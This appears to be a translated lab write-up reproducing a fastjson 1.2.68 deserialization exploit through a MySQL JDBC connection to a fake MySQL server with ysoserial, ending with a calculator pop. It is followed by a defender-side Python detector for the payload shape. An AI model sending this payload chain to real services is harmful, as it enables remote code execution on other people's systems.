  • fastjson 1.2.68 exploitation

    I Environment

    mac M1
    java version "1.7.0_21"
    JDK download: https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html

    II pom

    <?xml version="1.0" encoding="UTF-8"?>
    <project xmlns="http://maven.apache.org/POM/4.0.0"
             xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
             xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
        <modelVersion>4.0.0</modelVersion>
    
        <groupId>org.example</groupId>
        <artifactId>java7_fastjson</artifactId>
        <version>1.0-SNAPSHOT</version>
    
        <properties>
            <maven.compiler.source>7</maven.compiler.source>
            <maven.compiler.target>7</maven.compiler.target>
        </properties>
        <dependencies>
            <dependency>
                <groupId>com.alibaba</groupId>
                <artifactId>fastjson</artifactId>
                <version>1.2.68</version>
            </dependency>
            <dependency>
                <groupId>mysql</groupId>
                <artifactId>mysql-connector-java</artifactId>
                <version>5.1.29</version>
            </dependency>
        </dependencies>
    
    </project>
    

    III Java code

    import com.alibaba.fastjson.JSON;
    
    public class main {
        public static void main(String[] args){
            String string = "{\"@type\":\"java.lang.AutoCloseable\"{\"@type\":\"com.mysql.jdbc.JDBC4Connection\",\"hostToConnectTo\":\"127.0.0.1\",\"portToConnectTo\":3307,\"info\":{\"user\":\"yso_Jdk7u21_calc\",\"password\":\"oihnqwa\",\"statementInterceptors\":\"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"autoDeserialize\":\"true\"},\"databaseToConnectTo\":\"test\",\"url\":\"\"}";
            Object obj = JSON.parseObject(string);
            System.out.println(obj.toString());
        }
    }
    
    

    IV MySQL Fake Server

    https://github.com/fnmsd/MySQL_Fake_Server
    1 In config.json, change the Java path

    "javaBinPath":"/Library/Java/JavaVirtualMachines/jdk1.7.0_21.jdk/Contents/Home/bin/java",

    2 Put a ysoserial jar in place
    3 In server.py, force-override the command
    yso_command = "open /System/Applications/Calculator.app"

    elif username.startswith(b"yso_"):
        query = (yield from packet.read())
        _, yso_type, yso_command = username.decode('ascii').split("_")
        yso_command = "open /System/Applications/Calculator.app"
    

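    V Run

    Run the Java code; the calculator pops up successfully.

    VI Open questions

    1 Whether or not it succeeds, the error "Could not map transaction isolation '11 to a valid JDBC level." is always reported.
    2 How can this be exploited under JDK 1.8?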
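
A defender-side check for the request shape used in the Java code section, as an added example (not from the original post or from the fastjson project): it flags the `@type` values and Connector/J properties that appear in that string. The sample bodies and the names `scan_body` and `strict_parse_ok` are constructed for illustration; the scan is a tolerant regex pass because the string in the Java code is not strictly valid JSON, so a strict parser would reject it before any rule ran.

```python
import json
import re

# Class-name prefixes taken from the string on this page; extend as needed.
SUSPECT_TYPES = ("java.lang.AutoCloseable", "com.mysql.jdbc.")
# MySQL Connector/J properties that the string on this page sets.
SUSPECT_PROPS = ("autoDeserialize", "statementInterceptors")

TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]*)"')
UNICODE_ESC = re.compile(r'\\u([0-9a-fA-F]{4})')
HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')

def _decode_escapes(text):
    # A parser that honours \uXXXX / \xXX escapes sees the decoded name,
    # so decode first and match on the same text the parser would act on.
    text = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)

def strict_parse_ok(body):
    """True if a strict JSON parser accepts the body."""
    try:
        json.loads(body)
        return True
    except ValueError:
        return False

def scan_body(body):
    """Return a sorted list of findings for one request body."""
    text = _decode_escapes(body)
    findings = set()
    for name in TYPE_RE.findall(text):
        if name.startswith(SUSPECT_TYPES):
            findings.add("type:" + name)
    for prop in SUSPECT_PROPS:
        if re.search(r'"%s"\s*:' % re.escape(prop), text):
            findings.add("prop:" + prop)
    return sorted(findings)

# Constructed sample bodies (abbreviated; not captured traffic).
SAMPLES = {
    "page_shape": r'{"@type":"java.lang.AutoCloseable"{"@type":'
                  r'"com.mysql.jdbc.JDBC4Connection","info":{"autoDeserialize":"true"}}',
    "escaped_key": r'{"\u0040type":"java.lang.AutoCloseable","url":""}',
    "benign": r'{"user":"alice","type":"order"}',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, strict_parse_ok(body), scan_body(body))
```
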

  • Original article: https://www.cnblogs.com/huim/p/15525838.html